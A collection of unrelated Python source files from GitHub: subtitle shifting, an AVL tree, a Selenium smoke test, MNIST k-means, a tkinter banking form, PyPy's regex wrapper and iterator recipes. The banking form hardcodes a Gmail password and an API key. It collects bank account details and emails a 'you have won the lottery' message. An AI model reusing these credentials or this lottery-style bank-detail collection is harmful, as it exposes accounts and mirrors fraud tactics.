    output_json = 'JSON.json'
    classify_images(model_path, image_dir, target_size, output_json)
| Donike98/Assignment_Solaborate | model_inference/JSON.py | JSON.py | py | 1,701 | python | en | code | 0 | github-code | 36 |
31931640588 | import srt
from datetime import timedelta
# Input/output files and the 1-based range of subtitle indices to shift.
INPUT = "You've Got Mail (si).srt"
OUTPUT = "out.srt"
START = 1411
END = -1
# Delay applied to every selected subtitle cue.
SHIFT = timedelta(milliseconds=1000)

with open(INPUT) as f:
    subs = list(srt.parse(f.read()))

# Shift both edges of each cue in the selected slice.
# NOTE(review): END = -1 makes the slice exclude the very last subtitle;
# use END = None if the shift should run through the end of the file.
for sub in subs[START-1:END]:
    sub.start += SHIFT
    sub.end += SHIFT

with open(OUTPUT, 'w') as f:
    f.write(srt.compose(subs))
| aquiire/liyum-awith | sync.py | sync.py | py | 353 | python | en | code | 0 | github-code | 36 |
class avl:
    """Self-balancing (AVL) binary-search-tree node.

    Attributes:
        val   -- the key stored at this node
        left  -- left child node or None
        right -- right child node or None
        depth -- height of the subtree rooted here (0 for a leaf)
        bal   -- balance factor: height(right) - height(left)

    Fix over the original: the rotations used `self = top`, which only
    rebinds a local name and never changes the tree, and the balance
    factors were accumulated incorrectly. Rotations now swap values and
    re-link children so the subtree-root *object* never changes; callers
    can keep a reference to the node they created and it stays the root.
    """

    def __init__(self, val):
        self.val = val
        self.left = None
        self.right = None
        self.bal = 0
        self.depth = 0

    @staticmethod
    def _height(node):
        # Height of a possibly-missing subtree; an empty subtree is -1.
        return node.depth if node is not None else -1

    def _refresh(self):
        # Recompute height and balance factor from the children.
        self.depth = 1 + max(self._height(self.left), self._height(self.right))
        self.bal = self._height(self.right) - self._height(self.left)

    def rotateLeft(self):
        """Left-rotate this subtree in place (right child becomes root)."""
        pivot = self.right
        # Swap values so `self` remains the subtree-root object.
        self.val, pivot.val = pivot.val, self.val
        self.right = pivot.right
        pivot.right = pivot.left
        pivot.left = self.left
        self.left = pivot
        pivot._refresh()
        self._refresh()
        return True

    def rotateRight(self):
        """Right-rotate this subtree in place (left child becomes root)."""
        pivot = self.left
        self.val, pivot.val = pivot.val, self.val
        self.left = pivot.left
        pivot.left = pivot.right
        pivot.right = self.right
        self.right = pivot
        pivot._refresh()
        self._refresh()
        return self

    def addNode(self, node):
        """Insert *node* in BST order (duplicates go right) and rebalance."""
        if node.val < self.val:
            if self.left is None:
                self.left = node
            else:
                self.left.addNode(node)
        else:
            if self.right is None:
                self.right = node
            else:
                self.right.addNode(node)
        self._refresh()
        if self.bal < -1:
            # Left-heavy; a left-right case needs an inner rotation first.
            if self.left.bal > 0:
                self.left.rotateLeft()
            self.rotateRight()
        elif self.bal > 1:
            # Right-heavy; a right-left case needs an inner rotation first.
            if self.right.bal < 0:
                self.right.rotateRight()
            self.rotateLeft()
        return True

    def preOrderTraversal(self):
        """Print keys root-left-right."""
        print(self.val)
        if self.left:
            self.left.preOrderTraversal()
        if self.right:
            self.right.preOrderTraversal()
        return True

    def inOrderTraversal(self):
        """Print keys in ascending order."""
        if self.left:
            self.left.inOrderTraversal()
        print(self.val)
        if self.right:
            self.right.inOrderTraversal()
        return True

    def postOrderTraversal(self):
        """Print keys left-right-root."""
        if self.left:
            self.left.postOrderTraversal()
        if self.right:
            self.right.postOrderTraversal()
        print(self.val)
# Build a small tree and insert a few nodes.
x = avl(6)
y = avl(3)
z = avl(1)
a = avl(4)
x.addNode(y)
x.addNode(z)
x.addNode(a)
print("Tree: ")
# NOTE(review): this traverses from `y`, not from the root `x` -- confirm
# that printing only y's subtree is intended.
y.postOrderTraversal()
| youngseok-seo/cs-fundamentals | Trees/avl.py | avl.py | py | 2,367 | python | en | code | 0 | github-code | 36 |
35205340902 | from RocketMilesClass import RocketMiles
import time
import logging.handlers
import datetime
import os
#Smoke test for basic functionality of the Search Results page for the Rocketmiles.com search app.
#This module contains an error logger, test preconditions, and TCIDs 9-10.
#Initializing class object.
# Initializing class object (the selenium wrapper for rocketmiles.com).
RM = RocketMiles()

#Error Logger
#Create a new log folder if none exists, then the log file.
# NOTE(review): the bare `except: print()` clauses below swallow every
# error silently (print() emits only a blank line) -- consider
# os.makedirs(..., exist_ok=True) and logging the failure instead.
try:
    os.mkdir('logs/')
except:
    print()
try:
    os.mkdir('logs/SearchResultsModule')
except:
    print()
#Creating log filepath. Syntax is an acronym for the module (in this case, Smoke Test Checkout), followed by a Year_Month_Day__Hour_Minute_Second timestamp.
logSuffix = datetime.datetime.now()
logName = 'logs/SearchResultsModule/STSR_log_' + logSuffix.strftime('%Y_%m_%d__%H%M_%S') + '.log'
try:
    logFileCreate = open(logName,"w+")
    logFileCreate.close()
except:
    print()

#Set up logging objects
logsHandler = logging.handlers.WatchedFileHandler(os.environ.get("LOGFILE", logName))
logsFormatting = logging.Formatter(logging.BASIC_FORMAT)
logsHandler.setFormatter(logsFormatting)
root = logging.getLogger()
root.setLevel(os.environ.get("LOGLEVEL", "INFO"))
root.addHandler(logsHandler)
print("Current testing log file is: ", logName)

#Preconditions for proceeding with smoke test.
try:
    logging.info('Starting smoke test preconditions.')
    print('Starting smoke test preconditions.')
    RM.open_search_page()
    RM.close_cookie_banner()
    RM.loadtime()
except Exception as err:
    print(str(err))
    logging.exception(str(err))

#Smoke Test for Search Results (TCIDs 9-10),
try:
    #TCID 9: Search Page - Can a user sort results by Miles using the Sort By dialogue box?
    print('Beginning TCID 9: Search Page - Can a user sort results by Miles using the Sort By dialogue box?')
    logging.info('Beginning TCID 9: Search Page - Can a user sort results by Miles using the Sort By dialogue box?')
    RM.select_sort_by_field()
    RM.click_miles()
    RM.loadtime()
    print('TCID 9 has been executed.')
    logging.info('TCID 9 has been executed.')

    #TCID 10: Search Page - Can a user select the "Select Now" button for the first listing?
    print('Beginning TCID 10: Search Page - Can a user select the "Select Now" button for the first listing?')
    logging.info('Beginning TCID 10: Search Page - Can a user select the "Select Now" button for the first listing?')
    RM.select_hotel()
    RM.loadtime()
    print('TCID 10 has been executed.')
    logging.info('TCID 10 has been executed.')
except Exception as err:
    logging.exception(str(err))

#Ending smoke test for Search Results module.
print('Search Results module smoke test complete. Closing browser.')
RM.close_browser()
logging.info('Search Results module smoke test complete. Browser closed.') | just-hugo/Test-Automation | Rocketmiles/SmokeTestSearchResultsModule.py | SmokeTestSearchResultsModule.py | py | 2,827 | python | en | code | 0 | github-code | 36 |
27621948392 | import time
import pandas as pd
import numpy as np
import random
from sklearn.metrics.pairwise import cosine_similarity, euclidean_distances,manhattan_distances
from sklearn.preprocessing import MinMaxScaler
from sklearn.decomposition import PCA
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
#CLASS START=====================================================================================================================
class kmeans:
    """K-means clustering of MNIST images after MinMax scaling, PCA and
    t-SNE reduction to 2D; includes elbow plots for iterations and k."""

    def __init__(self,k):
        self.k = k

    #Function to read and preproccess the data
    def read_data(self):
        MNIST_df = pd.read_csv("image_new_test_MNIST.txt", header=None)
        MNIST_array = np.array(MNIST_df)
        MNIST_array = MNIST_array.astype(float)
        #normalization of data using minmax scaler
        scaler = MinMaxScaler()
        scaled_MNIST_array = scaler.fit_transform(MNIST_array)
        #dimension reduction
        pca = PCA(n_components= 30)
        pca_MNIST_array = pca.fit_transform(scaled_MNIST_array)
        #high dimension reduction using TSNE
        tsne = TSNE(n_components = 2, perplexity = 40, init = 'pca', random_state=0)
        tsne_MNIST_array = tsne.fit_transform(pca_MNIST_array)
        return tsne_MNIST_array, MNIST_df

    #Function to calculate the manhattan distance
    def clustering_manhattan_distance(self, MNIST_array, centroids):
        # Distance: each point is assigned to the centroid with the
        # smallest manhattan distance (argmin).
        distance_matrix = manhattan_distances(MNIST_array, centroids)
        closest_centroids = []
        for i in range(distance_matrix.shape[0]):
            c = np.argmin(distance_matrix[i])
            closest_centroids.append(c)
        return closest_centroids

    #Function to calculate the similarity
    def clustering_cosine_similarity(self, MNIST_array, centroids):
        # Similarity: argmax here, since larger cosine similarity = closer.
        distance_matrix = cosine_similarity(MNIST_array, centroids)
        closest_centroids = []
        for i in range(distance_matrix.shape[0]):
            c = np.argmax(distance_matrix[i])
            closest_centroids.append(c)
        return closest_centroids

    #Function to calculate euclidean distance
    def clustering_euclidean_distance(self, MNIST_array, centroids):
        distance_matrix = euclidean_distances(MNIST_array, centroids)
        closest_centroids = []
        for i in range(distance_matrix.shape[0]):
            c = np.argmin(distance_matrix[i])
            closest_centroids.append(c)
        return closest_centroids

    #Function to clculate the centroids
    def calculate_centroids(self, MNIST_array, nearest_centroid, centroids):
        """Return the per-cluster mean centroids and the per-cluster sum of
        squared (manhattan) distances.

        NOTE(review): clusters that end up with no members are skipped, so
        the number of centroids can shrink between iterations -- confirm
        this is intended.
        """
        cluster_d = list()
        #all_cluster_distances = [0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0]
        all_cluster_distances = np.zeros(len(centroids))
        new_centroids = list()
        new_df = pd.concat([pd.DataFrame(MNIST_array), pd.DataFrame(nearest_centroid, columns=['Cluster'])], axis=1)
        new_df_arr = np.array(new_df['Cluster'])
        for c in set(new_df_arr):
            thiscluster = new_df[new_df['Cluster'] == c][new_df.columns[:-1]]
            temp = np.array(centroids[c])
            temp = temp.reshape(1,-1)
            #cluster_d = euclidean_distances(thiscluster, temp)
            cluster_d = manhattan_distances(thiscluster, temp)
            for d in cluster_d:
                all_cluster_distances[c] += d*d
            cluster_mean = thiscluster.mean(axis=0)
            new_centroids.append(cluster_mean)
        return new_centroids, all_cluster_distances

    #Function to visualize the SSE and no.of iterations
    def visualize_sse(self, iterations, SSE):
        plt.figure()
        plt.plot(range(iterations), SSE, 'rx-')
        plt.xlabel('No.of iterations')
        plt.ylabel('SSE(Sum of squared errors)')
        plt.title('Elbow Method showing the optimal iterations')
        plt.show()

    #Function to visualize the SSE and different k-values:
    def visualize_k_sse(self):
        # Runs a full 50-iteration clustering for every even k in [2, 20]
        # and plots the best SSE for each -- this is slow.
        MNIST_array, MNIST_df = self.read_data()
        all_SSE = []
        all_k = []
        for k in range(2,21,2):
            #Randomly select three points as centroids
            centroid_index = random.sample(range(0, len(MNIST_df)), k)
            centroids = list()
            for i in centroid_index:
                centroids.append(MNIST_array[i])
            #converting list into numpy array
            centroids = np.array(centroids)
            #List for sum of squared errors
            SSE = list()
            no_of_iterations = 50
            closest_centroid = list()
            for i in range(no_of_iterations):
                closest_centroid = self.clustering_manhattan_distance(MNIST_array, centroids)
                #closest_centroid = clustering_cosine_similarity(iris_array, centroids)
                centroids, all_cluster_d = self.calculate_centroids(MNIST_array, closest_centroid, centroids)
                SSE.append(sum(all_cluster_d))
            all_SSE.append(min(SSE))
            all_k.append(k)
        #Plot the values
        plt.figure()
        plt.plot(all_SSE , all_k,'rx-')
        plt.xlabel('SSE')
        plt.ylabel('K-values')
        plt.title('The Elbow Method showing the optimal k - value')
        plt.show()

    #Function for k-means clustering
    def main_kmeans(self):
        """Cluster the data into self.k clusters (manhattan distance),
        plot the SSE curve and write 1-based cluster ids to a CSV."""
        MNIST_array, MNIST_df = self.read_data()
        #number of clusters
        k = self.k
        #Randomly select k number of points as centroids
        centroid_index = random.sample(range(0, len(MNIST_df)), k)
        centroids = list()
        for i in centroid_index:
            centroids.append(MNIST_array[i])
        #converting list into numpy array
        centroids = np.array(centroids)
        #List for sum of squared errors
        SSE = list()
        no_of_iterations = 50
        closest_centroid = list()
        for i in range(no_of_iterations):
            #closest_centroid = self.clustering_euclidean_distance(MNIST_array, centroids)
            #closest_centroid = self.clustering_cosine_similarity(MNIST_array, centroids)
            closest_centroid = self.clustering_manhattan_distance(MNIST_array, centroids)
            centroids, all_cluster_d = self.calculate_centroids(MNIST_array, closest_centroid, centroids)
            SSE.append(sum(all_cluster_d))
        clustered_MNIST_df = pd.concat([pd.DataFrame(MNIST_array), pd.DataFrame(closest_centroid, columns=['Cluster'])], axis=1)
        # Convert 0-based cluster indices to 1-based labels for the output.
        clustered_MNIST_df.replace({0:1,1:2,2:3,3:4,4:5,5:6,6:7,7:8,8:9,9:10}, inplace=True)
        #To visualize the number iterations on kmeans and SSE
        self.visualize_sse(no_of_iterations, SSE)
        #Saving the results into the file
        clustered_MNIST_df.to_csv('MNIST_results.csv',columns=['Cluster'], index =False, header = False)
#CLASS END=====================================================================================================================
#MAIN START=====================================================================================================================
#Execution start time
# NOTE(review): this runs at import time (no __main__ guard) -- confirm.
start_time = time.time()
kmeans_obj = kmeans(k = 10)
kmeans_obj.main_kmeans()
#To visualize the different k values and SSE
#kmeans_obj.visualize_k_sse()
print("Total execution time :", time.time() - start_time, "seconds")
#MAIN END=====================================================================================================================
| hrishivib/k-means-iris-MNIST-classification | k-means_MNIST.py | k-means_MNIST.py | py | 7,624 | python | en | code | 0 | github-code | 36 |
36376749917 | # Devin Fledermaus Class 1
import tkinter
from tkinter import *
from tkinter import messagebox
from playsound import playsound
import requests
from datetime import datetime
import re
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
# Creating the window
root = Tk()
root.geometry("700x800")
root.resizable(False, False)
root.title("Banking Details")
root.config(bg="blue")
# Captured once at startup; used later as the logged-in / claimed
# timestamp, so it will be stale by the time the form is submitted.
now = datetime.now()
class BankDetails:
    """Tkinter form collecting banking details, with a ZAR currency
    converter (exchangerate-api.com) and a congratulation email sender.

    SECURITY: Gmail credentials and the exchange-rate API key are
    hardcoded below -- move them to environment variables or a secrets
    store before any real use.
    """

    def __init__(self, window):
        # Labels
        self.lbl1 = Label(window, text="Banking Details", font=("Arial", 30))
        self.lbl1.place(x=200, y=30)
        self.lbl2 = Label(window, text="Account Holder Name", font=("Arial", 15))
        self.lbl2.place(x=50, y=100)
        self.lbl3 = Label(window, text="Account number", font=("Arial", 15))
        self.lbl3.place(x=50, y=150)
        self.lbl4 = Label(window, text="Bank", font=("Arial", 15))
        self.lbl4.place(x=50, y=200)

        # Entries
        self.ent1 = Entry(root, width=30)
        self.ent1.place(x=300, y=100)
        self.ent2 = Entry(root, width=30)
        self.ent2.place(x=300, y=150)
        self.ent3 = Entry(root, width=20)
        self.ent3.place(x=150, y=500)
        # ent4 shows the conversion result; readonly so users cannot edit it.
        self.ent4 = Entry(root, width=20, state="readonly")
        self.ent4.place(x=150, y=650)

        # OptionMenu
        self.default_txt = "Select Bank"
        self.default_var = tkinter.StringVar(value=self.default_txt)
        self.optmenu = OptionMenu(root, self.default_var, "Absa Bank", "Capitec Bank", "Standard Bank", "First National Bank")
        self.optmenu.place(x=300, y=200)

        # Buttons
        self.btn = Button(root, text="Submit", width=5, bg="green", command=self.check, borderwidth=5)
        self.btn.place(x=300, y=320)
        self.clrbtn = Button(root, text="Clear", width=5, bg="green", command=self.clear, borderwidth=5)
        self.clrbtn.place(x=150, y=320)
        self.extbtn = Button(root, text="Exit", width=5, bg="green", command=self.exit_btn, borderwidth=5)
        self.extbtn.place(x=450, y=320)
        self.conbtn = Button(root, text="Convert", width=16, bg="green", command=self.convert, borderwidth=5)
        self.conbtn.place(x=150, y=570)

        # Retrieving the information from an external JSON file as a source of reference
        self.conversion_rate = {}
        try:
            self.information = requests.get('https://v6.exchangerate-api.com/v6/910ab09f145c5695a5228187/latest/ZAR')
            information_json = self.information.json()
            self.conversion_rate = information_json['conversion_rates']
        except requests.exceptions.ConnectionError:
            messagebox.showerror("Error", "No internet connection. Please try again later.")

        # Listbox of target currency codes for the converter.
        self.convert_list = Listbox(root, width=15, bg="white")
        for i in self.conversion_rate.keys():
            self.convert_list.insert(END, str(i))
        self.convert_list.place(x=370, y=500)

    # Defining the buttons
    # Defining my conversion button
    def convert(self):
        """Convert the ZAR amount in ent3 to the currency selected in the
        listbox; re-fetches the rates on every click."""
        try:
            information = requests.get('https://v6.exchangerate-api.com/v6/910ab09f145c5695a5228187/latest/ZAR')
            information_json = information.json()
            conversion_rate = information_json['conversion_rates']
            num = float(self.ent3.get())
            ans = num * information_json['conversion_rates'][self.convert_list.get(ACTIVE)]
            # Temporarily make ent4 writable to show the result.
            self.ent4['state'] = 'normal'
            self.ent4.delete(0, END)
            self.ent4.insert(0, ans)
            self.ent4['state'] = 'readonly'
        except (ValueError, requests.exceptions.ConnectionError):
            self.ent3.delete(0, END)
            self.ent4.delete(0, END)
            messagebox.showerror("Error", "Please enter digits")

    # Sending my email
    def verify(self):
        """Append the form data to user_details.txt, then email the most
        recent email address found in that file.

        NOTE(review): this form never collects an email address -- the
        regex relies on an email having been written to user_details.txt
        by another module; confirm that assumption.
        """
        # text file
        w = open("user_details.txt", "a+")
        w.write("Account Holder Name: " + self.ent1.get() + "\n")
        w.write("Account Number: " + self.ent2.get() + "\n")
        w.write("Bank: " + self.default_var.get() + "\n")
        w.write("Logged in at " + str(now) + " " + "&" + "\n")
        w.write("\n")
        w.close()
        file_to_read = "user_details.txt"
        file = open(file_to_read, "r")
        list_file = file.readlines()
        email_list = str(list_file)
        emails = re.findall(r"[a-z0-9\.\-+_]+@[a-z0-9\.\-+_]+\.[a-z]+", email_list)
        email = emails[-1]
        sender_email_id = 'lottodevin@gmail.com'
        receiver_email_id = email
        # SECURITY: hardcoded password -- do not ship this.
        password = "Pythonlotto"
        subject = "Congratulations"
        msg = MIMEMultipart()
        msg['From'] = sender_email_id
        msg['To'] = receiver_email_id
        msg['Subject'] = subject
        body = "You have won the lottery.\n"
        body = body + "You will be contacted for further details"
        msg.attach(MIMEText(body, 'plain'))
        text = msg.as_string()
        s = smtplib.SMTP('smtp.gmail.com', 587)
        # start TLS for security
        s.starttls()
        # Authentication
        s.login(sender_email_id, password)
        print(receiver_email_id)
        # message to be sent
        # sending the mail
        s.sendmail(sender_email_id, receiver_email_id, text)
        # terminating the session
        s.quit()

    # Defining the submit button
    def check(self):
        """Validate the form; on success, log the claim, send the email and
        close the app. NOTE(review): the file is written *before*
        validation, so invalid submissions are also recorded -- confirm."""
        sel = self.ent1.get()
        sel2 = self.ent2.get()
        # text file
        w = open("user_details.txt", "a+")
        w.write("Account Holder Name: " + str(sel) + "\n")
        w.write("Account Number: " + str(sel2) + "\n")
        w.write("Bank: " + self.default_var.get() + " " + "&" + "\n")
        w.write("Winnings Claimed at: " + str(now) + "\n")
        w.close()
        # Account holder error
        if not sel.isalpha():
            messagebox.showerror('Account Holder Name', 'Please make sure account holder name is entered correctly')
        # Account number error
        elif not sel2.isdigit():
            messagebox.showerror('Account Number', 'Please make sure account number is entered correctly')
        # No Bank selected error
        elif self.default_var.get() == "Select Bank":
            messagebox.showerror('Bank', 'Please select a bank')
        else:
            self.verify()
            self.exit_btn()

    # Defining my clear button
    def clear(self):
        # Requires clear.mp3 next to the script.
        playsound("clear.mp3")
        self.ent1.delete(0, END)
        self.ent2.delete(0, END)
        self.default_var.set(self.default_txt)
        self.ent3.delete(0, END)
        self.ent4['state'] = "normal"
        self.ent4.delete(0, END)
        self.ent4['state'] = "readonly"

    # Defining my exit button with messagebox
    def exit_btn(self):
        # Requires exit.mp3 next to the script.
        playsound("exit.mp3")
        msg = messagebox.askquestion("Termination", "Are you sure you want to close the program?")
        if msg == "yes":
            root.destroy()
# Build the form and enter the Tk event loop.
obj_BankDetails = BankDetails(root)
# Run Program
root.mainloop()
| DevinFledermaus/Lotto_EOMP | main3.py | main3.py | py | 7,008 | python | en | code | 0 | github-code | 36 |
43302270494 | """
This is not used in a PyPy translation, but it can be used
in RPython code. It exports the same interface as the
Python 're' module. You can call the functions at the start
of the module (except the ones with @not_rpython for now).
They must be called with a *constant* pattern string.
"""
import re, sys
from rpython.rlib.rsre import rsre_core, rsre_char
from rpython.rlib.rsre.rpy import get_code as _get_code
from rpython.rlib.unicodedata import unicodedb
from rpython.rlib.objectmodel import specialize, we_are_translated
from rpython.rlib.objectmodel import not_rpython
rsre_char.set_unicode_db(unicodedb)
# Flag constants re-exported from the stdlib re module.
I = IGNORECASE = re.I # ignore case
L = LOCALE = re.L # assume current 8-bit locale
U = UNICODE = re.U # assume unicode locale
M = MULTILINE = re.M # make anchors look for newline
S = DOTALL = re.S # make dot match newline
X = VERBOSE = re.X # ignore whitespace and comments

# Module-level convenience wrappers mirroring the re module API.
# `pattern` must be a *constant* string (see module docstring): compile()
# is @specialize.memo(), which memoizes per constant at translation time.
@specialize.call_location()
def match(pattern, string, flags=0):
    "Compile *pattern* and match at the start of *string*."
    return compile(pattern, flags).match(string)

@specialize.call_location()
def search(pattern, string, flags=0):
    "Compile *pattern* and search anywhere in *string*."
    return compile(pattern, flags).search(string)

@specialize.call_location()
def findall(pattern, string, flags=0):
    "Compile *pattern* and return all non-overlapping matches."
    return compile(pattern, flags).findall(string)

@specialize.call_location()
def finditer(pattern, string, flags=0):
    "Compile *pattern* and iterate over all matches."
    return compile(pattern, flags).finditer(string)

@not_rpython
def sub(pattern, repl, string, count=0):
    return compile(pattern).sub(repl, string, count)

@not_rpython
def subn(pattern, repl, string, count=0):
    return compile(pattern).subn(repl, string, count)

@specialize.call_location()
def split(pattern, string, maxsplit=0):
    "Compile *pattern* and split *string* on it."
    return compile(pattern).split(string, maxsplit)

@specialize.memo()
def compile(pattern, flags=0):
    "Compile a constant pattern into an RSREPattern (memoized)."
    code, flags, args = _get_code(pattern, flags, allargs=True)
    return RSREPattern(pattern, code, flags, *args)

escape = re.escape
error = re.error
class RSREPattern(object):
    """Compiled pattern mirroring the interface of re.compile()'s result,
    backed by the rsre_core matching engine (RPython-compatible)."""

    def __init__(self, pattern, code, flags,
                 num_groups, groupindex, indexgroup):
        self._code = code
        self.pattern = pattern
        self.flags = flags
        self.groups = num_groups
        self.groupindex = groupindex
        self._indexgroup = indexgroup

    def match(self, string, pos=0, endpos=sys.maxint):
        return self._make_match(rsre_core.match(self._code, string,
                                                pos, endpos))

    def search(self, string, pos=0, endpos=sys.maxint):
        return self._make_match(rsre_core.search(self._code, string,
                                                 pos, endpos))

    def findall(self, string, pos=0, endpos=sys.maxint):
        # NOTE: restricted to 0 or 1 capturing groups; more groups would
        # require returning tuples, which is not valid RPython here.
        matchlist = []
        scanner = self.scanner(string, pos, endpos)
        while True:
            match = scanner.search()
            if match is None:
                break
            if self.groups == 0 or self.groups == 1:
                item = match.group(self.groups)
            else:
                assert False, ("findall() not supported if there is more "
                               "than one group: not valid RPython")
                item = match.groups("")
            matchlist.append(item)
        return matchlist

    def finditer(self, string, pos=0, endpos=sys.maxint):
        scanner = self.scanner(string, pos, endpos)
        while True:
            match = scanner.search()
            if match is None:
                break
            yield match

    @not_rpython
    def subn(self, repl, string, count=0):
        """re.subn() equivalent; not RPython (uses re's template machinery)."""
        filter = repl
        if not callable(repl) and "\\" in repl:
            # handle non-literal strings; hand it over to the template compiler
            filter = re._subx(self, repl)
        start = 0
        sublist = []
        force_unicode = (isinstance(string, unicode) or
                         isinstance(repl, unicode))
        n = last_pos = 0
        while not count or n < count:
            match = rsre_core.search(self._code, string, start)
            if match is None:
                break
            if last_pos < match.match_start:
                sublist.append(string[last_pos:match.match_start])
            if not (last_pos == match.match_start
                             == match.match_end and n > 0):
                # the above ignores empty matches on latest position
                if callable(filter):
                    piece = filter(self._make_match(match))
                else:
                    piece = filter
                sublist.append(piece)
                last_pos = match.match_end
                n += 1
            elif last_pos >= len(string):
                break     # empty match at the end: finished
            #
            start = match.match_end
            if start == match.match_start:
                start += 1
        if last_pos < len(string):
            sublist.append(string[last_pos:])
        if n == 0:
            # not just an optimization -- see test_sub_unicode
            return string, n
        if force_unicode:
            item = u"".join(sublist)
        else:
            item = "".join(sublist)
        return item, n

    @not_rpython
    def sub(self, repl, string, count=0):
        item, n = self.subn(repl, string, count)
        return item

    def split(self, string, maxsplit=0):
        splitlist = []
        start = 0
        n = 0
        last = 0
        while not maxsplit or n < maxsplit:
            match = rsre_core.search(self._code, string, start)
            if match is None:
                break
            if match.match_start == match.match_end:     # zero-width match
                if match.match_start == len(string):     # at end of string
                    break
                start = match.match_end + 1
                continue
            splitlist.append(string[last:match.match_start])
            # add groups (if any)
            if self.groups:
                match1 = self._make_match(match)
                splitlist.extend(match1.groups(None))
            n += 1
            last = start = match.match_end
        splitlist.append(string[last:])
        return splitlist

    def scanner(self, string, start=0, end=sys.maxint):
        return SREScanner(self, string, start, end)

    def _make_match(self, res):
        # Wrap a raw rsre_core match context, or pass None through.
        if res is None:
            return None
        return RSREMatch(self, res)
class RSREMatch(object):
    """Match object mirroring re's MatchObject API over an rsre_core
    match context."""

    def __init__(self, pattern, ctx):
        self.re = pattern
        self._ctx = ctx

    def span(self, groupnum=0):
#        if not isinstance(groupnum, (int, long)):
#            groupnum = self.re.groupindex[groupnum]

        return self._ctx.span(groupnum)

    def start(self, groupnum=0):
        return self.span(groupnum)[0]

    def end(self, groupnum=0):
        return self.span(groupnum)[1]

    def group(self, group=0):
        # Unlike re, only a single group argument is supported (RPython).
        frm, to = self.span(group)
        if 0 <= frm <= to:
            return self._ctx._string[frm:to]
        else:
            return None

#    def group(self, *groups):
#        groups = groups or (0,)
#        result = []
#        for group in groups:
#            frm, to = self.span(group)
#            if 0 <= frm <= to:
#                result.append(self._ctx._string[frm:to])
#            else:
#                result.append(None)
#        if len(result) > 1:
#            return tuple(result)

    def groups(self, default=None):
        # flatten_marks() is called presumably for its caching side effect;
        # the returned value itself is unused -- verify against rsre_core.
        fmarks = self._ctx.flatten_marks()
        grps = []
        for i in range(1, self.re.groups+1):
            grp = self.group(i)
            if grp is None: grp = default
            grps.append(grp)
        if not we_are_translated():
            grps = tuple(grps)    # xxx mostly to make tests happy
        return grps

    def groupdict(self, default=None):
        d = {}
        for key, value in self.re.groupindex.iteritems():
            grp = self.group(value)
            if grp is None: grp = default
            d[key] = grp
        return d

    def expand(self, template):
        return re._expand(self.re, self, template)

    @property
    def regs(self):
        fmarks = self._ctx.flatten_marks()
        return tuple([(fmarks[i], fmarks[i+1])
                      for i in range(0, len(fmarks), 2)])

    @property
    def lastindex(self):
        self._ctx.flatten_marks()
        if self._ctx.match_lastindex < 0:
            return None
        return self._ctx.match_lastindex // 2 + 1

    @property
    def lastgroup(self):
        # NOTE(review): lastindex can be None; `None < 0` only works under
        # Python 2 semantics (this is RPython/py2 code).
        lastindex = self.lastindex
        if lastindex < 0 or lastindex >= len(self.re._indexgroup):
            return None
        return self.re._indexgroup[lastindex]

    @property
    def string(self):
        return self._ctx._string

    @property
    def pos(self):
        return self._ctx.match_start

    @property
    def endpos(self):
        return self._ctx.end
class SREScanner(object):
    """Stateful scanner yielding successive matches of *pattern* over
    *string*, advancing past each match (and past empty matches by one)."""

    def __init__(self, pattern, string, start, end):
        self.pattern = pattern
        self._string = string
        self._start = start
        self._end = end

    def _match_search(self, matcher):
        if self._start > len(self._string):
            return None
        match = matcher(self._string, self._start, self._end)
        if match is None:
            self._start += 1    # obscure corner case
        else:
            self._start = match.end()
            # Zero-width match (start == end): step forward to avoid
            # matching at the same position forever.
            if match.start() == self._start:
                self._start += 1
        return match

    def match(self):
        return self._match_search(self.pattern.match)

    def search(self):
        return self._match_search(self.pattern.search)
class Scanner:
    """Lexical scanner: pairs of (regex phrase, action), combined into one
    alternation; scan() tokenizes a string with the matching actions."""
    # This class is copied directly from re.py.
    def __init__(self, lexicon, flags=0):
        from rpython.rlib.rsre.rpy.sre_constants import BRANCH, SUBPATTERN
        from rpython.rlib.rsre.rpy import sre_parse
        self.lexicon = lexicon
        # combine phrases into a compound pattern
        p = []
        s = sre_parse.Pattern()
        s.flags = flags
        for phrase, action in lexicon:
            p.append(sre_parse.SubPattern(s, [
                (SUBPATTERN, (len(p)+1, sre_parse.parse(phrase, flags))),
                ]))
        s.groups = len(p)+1
        p = sre_parse.SubPattern(s, [(BRANCH, (None, p))])
        self.scanner = compile(p)
    def scan(self, string):
        """Return (tokens, remainder): actions applied to each match, plus
        any unscanned tail of *string*."""
        result = []
        append = result.append
        match = self.scanner.scanner(string).match
        i = 0
        while 1:
            m = match()
            if not m:
                break
            j = m.end()
            if i == j:
                break
            action = self.lexicon[m.lastindex-1][1]
            if callable(action):
                self.match = m
                action = action(self, m.group())
            if action is not None:
                append(action)
            i = j
        return result, string[i:]
| mozillazg/pypy | rpython/rlib/rsre/rsre_re.py | rsre_re.py | py | 10,856 | python | en | code | 430 | github-code | 36 |
15287706589 | ##encoding=UTF8
"""
This module provides high performance iterator recipes.
best time and memory complexity implementation applied.
compatible: python2 and python3
import:
from .iterable import (take, flatten, flatten_all, nth, shuffled, grouper, grouper_dict, grouper_list,
running_windows, cycle_running_windows, cycle_slice, count_generator)
"""
from __future__ import print_function
import collections
import itertools
import random
import sys
is_py2 = (sys.version_info[0] == 2)
if is_py2:
from itertools import ifilterfalse as filterfalse, izip_longest as zip_longest
else: # in python3
from itertools import filterfalse, zip_longest
def take(n, iterable):
    "Return first n items of the iterable as a list"
    first_n = itertools.islice(iterable, n)
    return list(first_n)
def flatten(listOfLists):
    """Flatten exactly one level of nesting, yielding sub-items lazily."""
    for sublist in listOfLists:
        for item in sublist:
            yield item
def flatten_all(listOfLists):
    """Flatten arbitrary depth of nesting; good for unknown nesting structures.

    Strings and bytes are treated as atomic items.  (In Python 3, ``str`` has
    ``__iter__`` and each character is itself a string, so the original
    ``hasattr(i, "__iter__")`` test recursed forever on any string element.)
    """
    for item in listOfLists:
        if hasattr(item, "__iter__") and not isinstance(item, (str, bytes)):
            for sub_item in flatten_all(item):
                yield sub_item
        else:
            yield item
def nth(iterable, n, default=None):
    """Return the item at 0-based position ``n``, or ``default`` if exhausted."""
    remainder = itertools.islice(iterable, n, None)
    return next(remainder, default)
def shuffled(iterable):
    """Return a new list with the items of ``iterable`` in random order.

    The input is never modified.  Unlike the previous
    ``random.sample(iterable, len(iterable))`` implementation, this works for
    any iterable (generators included), not only sized sequences.
    """
    items = list(iterable)
    random.shuffle(items)
    return items
